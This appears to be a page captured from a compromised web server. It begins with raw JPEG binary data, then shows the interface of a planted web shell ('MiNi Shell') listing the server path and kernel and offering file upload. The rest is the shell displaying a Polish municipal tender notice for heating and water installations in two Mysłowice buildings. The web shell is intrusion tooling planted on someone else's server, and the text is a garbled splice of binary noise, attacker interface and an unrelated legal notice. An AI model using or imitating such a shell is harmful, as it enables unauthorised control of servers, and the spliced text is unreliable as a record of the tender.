JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220823/0031689901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Kompleksowe wykonanie instalacji C.O., C.W.U. i Z.W. w 2 budynkach położonych w Mysłowicach przy ul. Bytomskiej 27 i 29 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Mysowice</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Miejski Zarząd Gospodarki Komunalnej w Mysłowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271570799</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Partyzantów 21</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mysłowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mzgk@mzgk.myslowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://mzgk.myslowice.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samorządowy zakład budżetowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowe wykonanie instalacji C.O., C.W.U. i Z.W. w 2 budynkach położonych w Mysłowicach przy ul. Bytomskiej 27 i 29 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5393e5bc-22e5-11ed-9071-8637ea33a6f9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00316899</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00014195/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Wykonanie wewnętrznej instalacji C.O. i C.W.U. w 2 obiektach położonych w Mysłowicach przy ul. Bytomskiej numer 27, 29</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt „Ograniczenie niskiej emisji poprzez poprawę efektywności energetycznej w budynkach mieszkalnych na terenie Miasta Mysłowice – etap II” współfinansowany ze środków Unii Europejskiej ze środków Programu Operacyjnego Infrastruktura i Środowisko 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mzgk.nowybip.pl/zamowienia-publiczne <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Strona postępowania:<br/>https://mzgk.nowybip.pl/zamowienia-publiczne<br/>oraz https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w<br/>szczególności składanie oświadczeń, wniosków), zawiadomień oraz przekazywanie informacji odbywa się<br/>elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na<br/>ePUAP oraz udostępnionego przez miniPortal. We wszelkiej korespondencji związanej z niniejszym<br/>postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP lub ID postępowania)<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email:<br/>mzgk@mzgk.myslowice.pl, za wyjątkiem oferty i dokumentów o których mowa w pkt IX SWZ, która<br/>powinna zostać złożona za pośrednictwem wskazanych w pkt IX i pkt XII narzędzi do komunikacji<br/>elektronicznej (zob. także: pkt 9 niniejszego punktu).<br/>3. Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji”<br/>jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za<br/>pomocą poczty elektronicznej, na wskazany powyżej adres email (za wyjątkiem oferty, która musi być<br/>złożona za pośrednictwem platformy MiniPortal).<br/>4. Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z<br/>2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w<br/>sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).<br/>5. Wykonawca może zwrócić się do zamawiającego z wnioskiem o wyjaśnienie treści SWZ.<br/>6. Zamawiający jest obowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed<br/>upływem terminu składania ofert, pod warunkiem, że wniosek o wyjaśnienie treści SWZ wpłynął do<br/>zamawiającego nie później niż na 4 dni przed upływem terminu składania ofert.<br/>7. Jeżeli zamawiający nie udzieli wyjaśnień w terminie, o którym mowa w pkt. 6 przedłuża termin składania<br/>ofert o czas niezbędny do zapoznania się wszystkich zainteresowanych wykonawców z wyjaśnieniami<br/>niezbędnymi do należytego przygotowania i złożenia ofert. W przypadku gdy wniosek o wyjaśnienie treści<br/>SWZ nie wpłynął w terminie, o którym mowa w pkt. 6 Zamawiający nie ma obowiązku udzielania wyjaśnień<br/>SWZ oraz obowiązku przedłużenia terminu składania ofert.<br/>8. Przedłużenie terminu składania ofert nie wpływa na bieg terminu składania wniosku o wyjaśnienie treści<br/>SWZ.<br/>9. Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”,<br/>dostępnej na stronie: https://miniportal.uzp.gov.pl/Instrukcje.<br/>10. Osoby wskazane do porozumiewania się z wykonawcami:<br/>Anna Wójcik, e-mail: mzgk@mzgk.myslowice.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 &#34; RODO”, zamawiający - Miejski Zarząd Gospodarki<br/>Komunalnej w Mysłowicach - informuje, że:<br/>1. administratorem danych osobowych jest Miejski Zarząd Gospodarki Komunalnej w Mysłowicach, ul.<br/>Partyzantów 21, 41-400 Mysłowice – reprezentowane przez Dyrektora<br/>2. dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>postępowaniem o udzielenie niniejszego zamówienia publicznego,<br/>3. odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy Pzp; ponadto dane osobowe mogą zostać<br/>przekazane na zasadach wynikających z ustawy z dnia 6 września 2001 r. o dostępie do informacji<br/>publicznej.<br/>4. dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres obowiązywania<br/>Umowy, a następnie przez 2 lata licząc od dnia 31 grudnia następującego po złożeniu zestawienia wydatków do Komisji Europejskiej, w którym ujęto ostatecznie wydatki dotyczące zakończenia projektu.<br/>Termin ten może zostać wydłużony w uzasadnionych przypadkach przez IZ. Okresy te dotyczą również<br/>wykonawców, którzy złożyli oferty i nie zostały one uznane jako najkorzystniejsze (nie zawarto z tymi<br/>wykonawcami Umowy).<br/>5. obowiązek podania danych osobowych bezpośrednio dotyczących osób fizycznych jest wymogiem<br/>ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie<br/>zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>6. w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosowanie do art. 22 RODO;<br/>7. osoba fizyczna posiada:<br/>1) na podstawie art. 15 RODO prawo dostępu do danych osobowych jej dotyczących;<br/>2) na podstawie art. 16 RODO prawo do sprostowania jej danych osobowych;<br/>3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że<br/>przetwarzanie danych osobowych jej dotyczących narusza przepisy RODO;<br/>8. osobie fizycznej nie przysługuje:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>9. W przypadku, gdy dla należytej realizacji zamówienia, konieczne będzie przetwarzanie danych osobowych,<br/>Strony zachowają w tym zakresie wszelkie wymagania wynikające z przepisów prawa polskiego oraz z<br/>przepisów bezpośrednio stosowanego prawa Unii Europejskiej w tym z przepisów Rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) oraz ustawy z dnia<br/>10 maja 2018 r. o ochronie danych osobowych (Dz. U. z 2019 r., poz. 1781). Jednocześnie w przypadku,<br/>o którym mowa w zdaniu poprzednim Strony zawartych Umów zawrą dodatkowe umowy o powierzeniu<br/>przetwarzania danych osobowych wykonawcy i podwykonawców bez dodatkowego (tj. wykraczającego<br/>poza wskazane w zawartych Umowach) wynagrodzenia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.17.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I – kompleksowe wykonanie instalacji C.O., C.W.U. oraz Z.W. w budynku położonym w<br/>Mysłowicach przy ul. Bytomskiej 27:<br/> Roboty budowlane będą polegały w szczególności na wykonaniu wszelkich prac<br/>demontażowych i rozbiórkowych związanych z wykonaniem instalacji C.O. C.W.U. i Z.W. w<br/>obiekcie, wykonaniu właściwej wentylacji, kompleksowym wykonaniu instalacji centralnego<br/>ogrzewania, ciepłej wody użytkowej i zimnej wody, w tym wykonaniu wymiennikowni i wszelkich<br/>niezbędnych prac do uruchomienia dostaw ciepła do obiektu oraz wykonania niezbędnych prób<br/>oraz wszelkich uzgodnień formalnoprawnych w tym m.in. zgłoszenia do UDT, itd.<br/>ZP.271.2.17.2022 – Kompleksowe wykonanie instalacji C.O., C.W.U. i Z.W. w 2 budynkach położonych w Mysłowicach przy ul. Bytomskiej 27 i 29<br/>str. 5<br/>Projekt „Ograniczenie niskiej emisji poprzez poprawę efektywności energetycznej w budynkach mieszkalnych<br/>na terenie Miasta Mysłowice – etap II” współfinansowany ze środków Unii Europejskiej ze środków Programu<br/>Operacyjnego Infrastruktura i Środowisko 2014-2020<br/> Obiekt, w którym będą wykonywane prace to budynek mieszkalny wielorodzinny, wybudowany<br/>ok. 1900 roku, zlokalizowany przy ul. Bytomskiej 27 w Mysłowicach.<br/> Prace będą wykonywane w zamieszkanym obiekcie i muszą być prowadzone w sposób<br/>niezakłócający normalnego funkcjonowania mieszkańców obiektu.<br/> Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1.1 – Dokumentacja techniczna<br/>– Bytomska 27, która obejmuje: projekt przebudowy i zmiany ogrzewania budynku, przedmiar<br/>oraz specyfikacja techniczna wykonania i odbioru robót budowlanych dla każdego z obiektów<br/>objętych przedmiotem zamówienia </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">45315600-4 - Instalacje niskiego napięcia</p> <p class="mb-0">45314320-0 - Instalowanie okablowania komputerowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">OPIS KRYTERIÓW, KTÓRYMI ZAMAWIAJĄCY BĘDZIE SIĘ KIEROWAŁ PRZY<br/>WYBORZE OFERTY, WRAZ Z PODANIEM WAG TYCH KRYTERIÓW I SPOSOBU<br/>OCENY OFERT<br/>1. Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami i ich<br/>wagami:<br/>L.p. Kryterium<br/>Znaczenie<br/>procentowe<br/>kryterium<br/>Maksymalna ilość<br/>punktów jakie może<br/>otrzymać oferta za<br/>dane kryterium<br/>1. Cena oferty (C) 60% 60<br/>2. Gwarancja (G) 10% 10<br/>3. Termin realizacji robót (T) 30% 30<br/>Cena ofert (C)<br/>W ramach kryterium ceny oferta otrzyma zaokrągloną do dwóch miejsc po przecinku zgodnie z<br/>przybliżeniem dziesiętnym ilość punktów wynikającą z działania:<br/>Oferta z najniższą ceną<br/>------------------------------------- x 60 pkt.<br/>Cena oferty badanej<br/>Przez „cenę” należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy z dnia 9 maja 2014 r.<br/>o informowaniu o cenach towarów i usług (Dz. U. z 2019 r., poz. 178)<br/>Wydłużenie okresu gwarancji (G)<br/>W przypadku kryterium &#34;wydłużenie okresu gwarancji&#34; do oceny będzie brana pod uwagę gwarancja<br/>zadeklarowana przez wykonawcę w Formularzu ofertowym - Załącznik nr 3 do SWZ.<br/>Każdy z wykonawców zobowiązany jest do udzielenia minimum 48 miesięcy gwarancji.<br/>Zamawiający przyzna punkty za wydłużenie okresu gwarancji w następujący sposób:<br/>G = 0, jeżeli wykonawca zaoferuje 48 miesięcy gwarancji (termin minimalny wymagany),<br/>G = 5, jeżeli wykonawca zaoferuje 54 miesięcy gwarancji,<br/>G = 10, jeżeli wykonawca zaoferuje 60 miesięcy gwarancji.<br/>W przypadku, gdy wykonawca zaoferuje gwarancję, pomiędzy przedziałami określonymi powyżej<br/>zamawiający przyzna punkty w ilości odpowiadającej dolnej wartości przedziału (np. w przypadku<br/>zaoferowania 25 miesięcy gwarancji wykonawca otrzyma 0 pkt, w przypadku zaoferowania 50 miesięcy<br/>gwarancji wykonawca otrzyma 5 pkt, 54 i powyżej 10 pkt)<br/>Do umowy przyjęty zostanie okres gwarancji faktycznie zaoferowany przez wykonawcę w ofercie.<br/>Niewpisanie żadnego okresu gwarancji spowoduje uznanie, że okres gwarancji będzie zgodny z<br/>wymaganiami określonymi w SWZ.<br/>Udzielana przez wykonawcę gwarancja winna być bezwarunkowa i wykonalna. Wzór karty gwarancyjnej<br/>stanowi integralną część Załącznika nr 2 do SWZ.<br/>Termin realizacji robót (T)<br/>W przypadku kryterium &#34;termin realizacji robót&#34; do oceny będzie brany pod uwagę termin zadeklarowany<br/>przez wykonawcę w Formularzu ofertowym - Załącznik nr 3 do SWZ. Każdy z wykonawców zobowiązany<br/>jest do wykonania robót w maksymalnym terminie 8 miesięcy od dnia podpisania Umowy.<br/>Zamawiający przyzna punkty za skrócenie terminu realizacji robót w następujący sposób:<br/>T = 0, jeżeli wykonawca zaoferuje 5 miesięcy (termin maksymalny wymagany),<br/>T = 15, jeżeli wykonawca zaoferuje 4 miesiące,<br/>T = 30, jeżeli wykonawca zaoferuje 3 miesiące,<br/>Zamawiający nie dopuszcza wskazywania terminów realizacji robót innych niż wskazane powyżej.<br/>Wykonawca, który zaoferuje inne niż wskazane powyżej wartości, otrzyma 0 punktów w niniejszym<br/>kryterium.<br/>W celu ostatecznego wyboru najkorzystniejszej oferty złożonej na wykonanie zamówienia w powiązaniu<br/>z przedstawionymi wyżej kryteriami zamawiający posłuży się następującym wzorem:<br/>PO = C + G + T<br/>gdzie:<br/>PO – liczba punktów przyznanych ofercie<br/>C – liczba punktów w kryterium „cena oferty”<br/>G – liczba punktów w kryterium „gwarancja”<br/>T – liczba punktów w kryterium „termin”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II – kompleksowe wykonanie instalacji C.O., C.W.U. oraz Z.W. w budynku położonym w<br/>Mysłowicach przy ul. Bytomskiej 29:<br/> Roboty budowlane będą polegały w szczególności na wykonaniu wszelkich prac<br/>demontażowych i rozbiórkowych związanych z wykonaniem instalacji C.O. C.W.U. i Z.W. w<br/>obiekcie, wykonaniu właściwej wentylacji, kompleksowym wykonaniu instalacji centralnego<br/>ogrzewania, ciepłej wody użytkowej i zimnej wody, w tym wykonaniu wymiennikowni i wszelkich<br/>niezbędnych prac do uruchomienia dostaw ciepła do obiektu oraz wykonania niezbędnych prób<br/>oraz wszelkich uzgodnień formalnoprawnych w tym m.in. zgłoszenia do UDT, itd.<br/> Obiekt, w którym będą wykonywane prace to budynek mieszkalny wielorodzinny, wybudowany<br/>ok. 1900 roku, zlokalizowany przy ul. Bytomskiej 29 w Mysłowicach.<br/> Prace będą wykonywane w zamieszkanym obiekcie i muszą być prowadzone w sposób<br/>niezakłócający normalnego funkcjonowania mieszkańców obiektu.<br/> Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1.2 – Dokumentacja techniczna<br/>– Bytomska 29, która obejmuje: projekt przebudowy i zmiany ogrzewania budynku, przedmiar<br/>oraz specyfikacja techniczna wykonania i odbioru robót budowlanych dla każdego z obiektów<br/>objętych przedmiotem 